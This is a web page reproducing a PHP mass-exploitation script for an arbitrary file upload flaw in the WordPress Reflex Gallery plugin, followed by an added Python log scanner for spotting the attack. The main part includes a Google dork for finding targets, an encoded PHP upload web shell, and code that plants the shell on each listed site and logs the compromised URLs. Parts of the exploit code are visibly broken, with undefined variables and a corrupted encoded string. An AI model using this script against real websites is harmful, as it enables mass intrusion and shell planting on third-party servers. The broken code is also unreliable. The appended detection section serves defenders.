geeko

Wordpress Plugin Reflex Gallery Arbitrary File Upload Mass Exploiter

<?php
/*
* Wordpress Plugin Reflex Gallery Arbitrary File Upload Mass Exploiter
* Google Dork: inurl:wp-content/plugins/reflex-gallery/
* Usage: php exp.php wordpress_site_list.txt
* Exploit Found By CrashBandicot
*/
$get = file_get_contents($argv[1]);
$list = explode("\r\n",$get);
$uploadfile="upload.php";
$dir ="wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php";

if(!file_exists($uploadfile)) {
$a1 = base64_decode("PD9waHAKaWYoaXNzZXQoJF9QT1NUWydTdWJtaXQnXSkpewogICAgJGZpbGVkaXIgPSAiIjsgCiAgICAk?bWF4ZmlsZSA9ICcyMDAwMDAwJzsKCiAgICAkdXNlcmZpbGVfbmFtZSA9ICRfRklMRVNbJ2ltYWdlJ11b?J25hbWUnXTsKICAgICR1c2VyZmlsZV90bXAgPSAkX0ZJTEVTWydpbWFnZSddWyd0bXBfbmFtZSddOwog?ICAgaWYgKGlzc2V0KCRfRklMRVNbJ2ltYWdlJ11bJ25hbWUnXSkpIHsKICAgICAgICAkYWJvZCA9ICRm?aWxlZGlyLiR1c2VyZmlsZV9uYW1lOwogICAgICAgIEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJHVzZXJmaWxl?X3RtcCwgJGFib2QpOwogIAplY2hvIjxjZW50ZXI+PGI+RG9uZSA9PT4gJHVzZXJmaWxlX25hbWU8L2I+?PC9jZW50ZXI+IjsKfQp9CmVsc2V7CmVjaG8nCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiIGVu?Y3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJpbWFnZSI+?PGlucHV0IHR5cGU9IlN1Ym1pdCIgbmFtZT0iU3VibWl0IiB2YWx1ZT0iU3VibWl0Ij48L2Zvcm0+JzsK?fQo/Pg==");
@file_get_contents($target.$dir);
if($file == FALSE) {
echo "Plugin Not Found\n";
continue;
}
else {
echo "Found\n[!] Exploiting $target:";
$tek = $target."/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03";
$ch = curl_init($tek);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// print $postResult;

if(preg_match("/success/",$postResult)) {
echo "Success\n[+] Shell Uploaded".$target."/wp-content/uploads/2015/03/$uploadfile";
$f = fopen("shells.log","a+");
fwrite($f , "$target"."/wp-content/uploads/2015/03/$uploadfile\n");
fclose($f);
}else{
echo "Failed\n";
}
}

}
?>
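For site owners checking whether this script was run against them, the following added example (not part of the original post) scans a web access log for POSTs to the plugin's uploader path named above, then for requests to `.php` files in the upload directory those POSTs selected through `Year` and `Month`. It assumes the Apache/nginx combined log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Upload handler path targeted by the script above (taken from the post).
UPLOADER = "/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php"
# Assumption: Apache/nginx "combined" access log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2015:10:01:02 +0000] "GET /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php HTTP/1.1" 200 51 "-" "-"
198.51.100.7 - - [12/Mar/2015:10:01:03 +0000] "POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03 HTTP/1.1" 200 16 "-" "-"
203.0.113.9 - - [12/Mar/2015:10:05:40 +0000] "GET /wp-content/uploads/2015/03/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2015:10:06:11 +0000] "POST /wp-content/uploads/2015/03/upload.php HTTP/1.1" 200 40 "-" "-"
"""

def find_upload_abuse(log_text):
    """Return (uploads, script_hits): POSTs to the uploader, then requests
    for .php files inside the upload directories those POSTs selected."""
    uploads, script_hits, dirs = [], [], set()
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if method == "POST" and url.path.lower() == UPLOADER.lower():
            q = parse_qs(url.query)
            year = q.get("Year", [""])[0]
            month = q.get("Month", [""])[0]
            if year.isdigit() and month.isdigit():
                dirs.add(f"/wp-content/uploads/{year}/{month}/")
            uploads.append((ts, ip, target, status))
        elif url.path.lower().endswith(".php") and any(url.path.startswith(d) for d in dirs):
            script_hits.append((ts, ip, url.path, status))
    return uploads, script_hits

if __name__ == "__main__":
    ups, hits = find_upload_abuse(SAMPLE_LOG)
    for row in ups:
        print("uploader POST:", *row)
    for row in hits:
        print("script request in uploads:", *row)
```

Any hit in the second list means a PHP file under `wp-content/uploads/` was requested after an uploader POST and should be inspected on disk. Removing or updating the plugin and denying PHP execution under the uploads directory at the web-server level closes this path.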
